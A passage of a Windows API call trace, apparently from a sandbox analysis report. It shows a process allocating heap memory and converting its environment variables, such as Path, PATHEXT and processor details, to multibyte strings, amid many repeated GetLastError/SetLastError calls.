25 [0096.474] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x19) returned 0x68eba8 [0096.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x68eba8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] GetLastError () returned 0x0 [0096.475] SetLastError (dwErrCode=0x0) [0096.475] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x30 [0096.475] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x34) returned 0x6916f0 [0096.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.475] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x17) returned 0x691730 [0096.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x691730, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.476] GetLastError () returned 0x0 [0096.476] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x34 [0096.477] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x38) returned 0x6916f0 [0096.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.477] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xe) returned 0x683238 [0096.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x683238, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.477] GetLastError () returned 0x0 [0096.477] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.478] SetLastError (dwErrCode=0x0) [0096.478] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x38 [0096.479] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x3c) returned 0x691750 [0096.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0096.479] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x95) returned 0x691798 [0096.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x691798, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.479] SetLastError (dwErrCode=0x0) [0096.479] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.480] SetLastError (dwErrCode=0x0) [0096.480] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691750) returned 0x3c [0096.481] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691750, Size=0x40) returned 0x691750 [0096.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0096.481] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3e) returned 0x6825b0 [0096.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x6825b0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0096.481] GetLastError () returned 0x0 [0096.481] SetLastError (dwErrCode=0x0) [0096.481] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.482] GetLastError () returned 0x0 [0096.482] SetLastError (dwErrCode=0x0) [0096.483] GetLastError () returned 0x0 [0096.483] SetLastError (dwErrCode=0x0) [0096.483] GetLastError () returned 0x0 [0096.483] SetLastError (dwErrCode=0x0) [0096.483] GetLastError () returned 0x0 [0096.483] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691750) returned 0x40 [0096.483] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691750, Size=0x44) returned 0x691838 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0096.483] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1b) returned 0x68ebd0 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x68ebd0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0096.483] GetLastError () returned 0x0 [0096.483] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x44 [0096.483] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x48) returned 0x691838 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0096.483] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1d) returned 0x68ebf8 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x68ebf8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0096.483] GetLastError () returned 0x0 [0096.483] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x48 [0096.483] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x4c) returned 0x691838 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0096.483] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x48) returned 0x686e90 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x686e90, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0096.483] GetLastError () returned 0x0 [0096.483] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x4c [0096.483] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x50) returned 0x691838 [0096.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.484] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x12) returned 0x6916f0 [0096.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6916f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0096.484] GetLastError () returned 0x0 [0096.484] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x50 [0096.484] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x54) returned 0x691838 [0096.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.484] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x691710 [0096.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x691710, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0096.484] GetLastError () returned 0x0 [0096.484] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x54 [0096.484] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x58) returned 0x691838 [0096.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0096.484] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1b) returned 0x68ec20 [0096.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x68ec20, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0096.484] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x58 [0096.484] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x5c) returned 0x691838 [0096.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0096.485] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68adc0 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x68adc0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0096.485] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x5c [0096.485] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x60) returned 0x691838 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0096.485] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x29) returned 0x68b4d0 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x68b4d0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0096.485] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x60 [0096.485] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x64) returned 0x691838 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0096.485] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1e) returned 0x68ec48 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x68ec48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0096.485] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x64 [0096.485] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x68) returned 0x691838 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0096.485] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x6b) returned 0x6918a8 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x6918a8, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0096.485] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691838) returned 0x68 [0096.485] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691838, Size=0x6c) returned 0x691920 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.485] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x17) returned 0x691750 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x691750, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0096.485] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x6c [0096.485] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x70) returned 0x691920 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.485] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xf) returned 0x683250 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x683250, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0096.485] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x70 [0096.485] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x74) returned 0x691920 [0096.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.486] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x16) returned 0x691770 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x691770, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0096.486] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x74 [0096.486] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, 